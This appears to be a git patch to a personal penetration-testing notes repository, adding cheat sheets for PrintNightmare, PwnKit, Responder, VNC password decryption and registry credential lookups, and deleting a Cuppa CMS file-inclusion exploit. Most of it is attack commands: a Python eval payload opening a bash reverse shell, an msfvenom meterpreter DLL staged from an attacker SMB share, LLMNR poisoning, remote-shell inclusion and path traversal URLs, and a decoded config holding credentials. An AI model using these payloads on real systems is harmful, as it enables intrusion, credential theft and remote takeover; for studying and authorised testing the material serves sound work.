From b0e1d1a2760ee76c161f68c156a1f69cabfe749e Mon Sep 17 00:00:00 2001 From: whx Date: Mon, 31 Jan 2022 18:30:47 +0100 Subject: [PATCH] bump --- .gitmodules | 3 + enumeration/docs/nfs.md | 4 + exploit/linux/pkexec/CVE_2021_4034.md | 11 +++ exploit/python/code_injection.md | 10 +++ exploit/web/remote_file_inclusion.txt | 87 ------------------- exploit/windows/PrintNightmare | 1 + exploit/windows/docs/printnightmare.md | 27 ++++++ exploit/windows/docs/responder.md | 10 +++ exploit/windows/impacket | 2 +- hashes/password_cracking/vnc.md | 6 ++ post_exploitation/docs/windows/registry.md | 7 ++ .../priv_esc/docs/windows/windows_priv_esc.md | 1 + 12 files changed, 81 insertions(+), 88 deletions(-) create mode 100644 enumeration/docs/nfs.md create mode 100644 exploit/linux/pkexec/CVE_2021_4034.md create mode 100644 exploit/python/code_injection.md delete mode 100644 exploit/web/remote_file_inclusion.txt create mode 160000 exploit/windows/PrintNightmare create mode 100644 exploit/windows/docs/printnightmare.md create mode 100644 exploit/windows/docs/responder.md create mode 100644 hashes/password_cracking/vnc.md create mode 100644 post_exploitation/docs/windows/registry.md diff --git a/.gitmodules b/.gitmodules index 3791fbb..4d93632 100644 --- a/.gitmodules +++ b/.gitmodules @@ -106,3 +106,6 @@ [submodule "telecommunications/sipvicious"] path = telecommunications/sipvicious url = https://github.com/EnableSecurity/sipvicious.git +[submodule "exploit/windows/PrintNightmare"] + path = exploit/windows/PrintNightmare + url = https://github.com/ly4k/PrintNightmare.git diff --git a/enumeration/docs/nfs.md b/enumeration/docs/nfs.md new file mode 100644 index 0000000..6efc7c9 --- /dev/null +++ b/enumeration/docs/nfs.md @@ -0,0 +1,4 @@ +# NFS Enumeration + +* `rpcinfo -p $TARGET_IP` +* `showmount -e $TARGET_IP` diff --git a/exploit/linux/pkexec/CVE_2021_4034.md b/exploit/linux/pkexec/CVE_2021_4034.md new file mode 100644 index 0000000..17777f4 --- /dev/null +++ b/exploit/linux/pkexec/CVE_2021_4034.md @@ -0,0 +1,11 @@ +# CVE-2021-4032 + +* [Qualys put it in the open](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) +* [arthepsy's exploit](https://github.com/arthepsy/CVE-2021-4034) + +* Arg counting starts at 1 inside pkexec logic +* `execve( "/usr/binpkexec", (char **){NULL}, env)` puts NULL into argc[1] +* The value behind NULL can be overwritten, which is the first env param + + + diff --git a/exploit/python/code_injection.md b/exploit/python/code_injection.md new file mode 100644 index 0000000..fc2b2e2 --- /dev/null +++ b/exploit/python/code_injection.md @@ -0,0 +1,10 @@ +# Code Injection + +* Python's `input()`, `exec()` and `eval()` makes it possible + +## Usage + +* Payload example +```python +eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#") +``` diff --git a/exploit/web/remote_file_inclusion.txt b/exploit/web/remote_file_inclusion.txt deleted file mode 100644 index a035a70..0000000 --- a/exploit/web/remote_file_inclusion.txt +++ /dev/null @@ -1,87 +0,0 @@ -# Exploit Title : Cuppa CMS File Inclusion -# Date : 4 June 2013 -# Exploit Author : CWH Underground -# Site : www.2600.in.th -# Vendor Homepage : http://www.cuppacms.com/ -# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip -# Version : Beta -# Tested on : Window and Linux - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -#################################### -VULNERABILITY: PHP CODE INJECTION -#################################### - -/alerts/alertConfigField.php (LINE: 22) - ------------------------------------------------------------------------------ -LINE 22: - ------------------------------------------------------------------------------ - - -##################################################### -DESCRIPTION -##################################################### - -An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. - -http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI] - -##################################################### -EXPLOIT -##################################################### - -http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? -http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd - -Moreover, We could access Configuration.php source code via PHPStream - -For Example: ------------------------------------------------------------------------------ -http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php ------------------------------------------------------------------------------ - -Base64 Encode Output: ------------------------------------------------------------------------------ -PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+ ------------------------------------------------------------------------------ - -Base64 Decode Output: ------------------------------------------------------------------------------ - ------------------------------------------------------------------------------ - -Able to read sensitive information via File Inclusion (PHP Stream) - -################################################################################################################ - Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 -################################################################################################################ \ No newline at end of file diff --git a/exploit/windows/PrintNightmare b/exploit/windows/PrintNightmare new file mode 160000 index 0000000..5ca891c --- /dev/null +++ b/exploit/windows/PrintNightmare @@ -0,0 +1 @@ +Subproject commit 5ca891c64d7dcd785730c8e6dec87476b786012c diff --git a/exploit/windows/docs/printnightmare.md b/exploit/windows/docs/printnightmare.md new file mode 100644 index 0000000..b4f25e0 --- /dev/null +++ b/exploit/windows/docs/printnightmare.md @@ -0,0 +1,27 @@ +# Print Nightmare + +* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git) + +* Create virtual env inside cloned repo and install impacket +```sh +pip install . +pip2 install . +``` + +* Create payload +```sh +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll +``` + +* Prepare msf multi handler + +* Inside virtualenv +```sh +smbserver share $(pwd) -smb2support +``` + +* Roll the exploit +```sh +python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll' +``` + diff --git a/exploit/windows/docs/responder.md b/exploit/windows/docs/responder.md new file mode 100644 index 0000000..1eae577 --- /dev/null +++ b/exploit/windows/docs/responder.md @@ -0,0 +1,10 @@ +# Responder + +* [lgandx's repo](https://github.com/lgandx/Responder.git) + +Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication + +## Usage +```sh +responder -I tun0 -wrvd +``` diff --git a/exploit/windows/impacket b/exploit/windows/impacket index 10e5395..e007046 160000 --- a/exploit/windows/impacket +++ b/exploit/windows/impacket @@ -1 +1 @@ -Subproject commit 10e53952e64e290712d49e263420b70b681bbc73 +Subproject commit e007046def3d7e2afa27dd83cb9e53f452099175 diff --git a/hashes/password_cracking/vnc.md b/hashes/password_cracking/vnc.md new file mode 100644 index 0000000..9903c26 --- /dev/null +++ b/hashes/password_cracking/vnc.md @@ -0,0 +1,6 @@ +# VNC Password Decoding + +* Found passwords in vnc config files may be decoded via +```sh + echo -n "" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv +``` diff --git a/post_exploitation/docs/windows/registry.md b/post_exploitation/docs/windows/registry.md new file mode 100644 index 0000000..72172f1 --- /dev/null +++ b/post_exploitation/docs/windows/registry.md @@ -0,0 +1,7 @@ +# Windows Registry + +## AutoLogin Password +* Automatic logon password is save in plaintext +``` +reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon" +``` diff --git a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md index 3ebdf78..72cf0b1 100644 --- a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md +++ b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md @@ -54,6 +54,7 @@ wmic service list brief | findstr "Running" * `SeImpersonatePrivilege` is necessary, check via `whoami priv` * Hot Potato is best before Server 2019 and Windows 10 (version 1809) * [Potatos](../../../../exploit/windows/docs/potatoes.md) +* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) ### Schedules Tasks * `schtasks`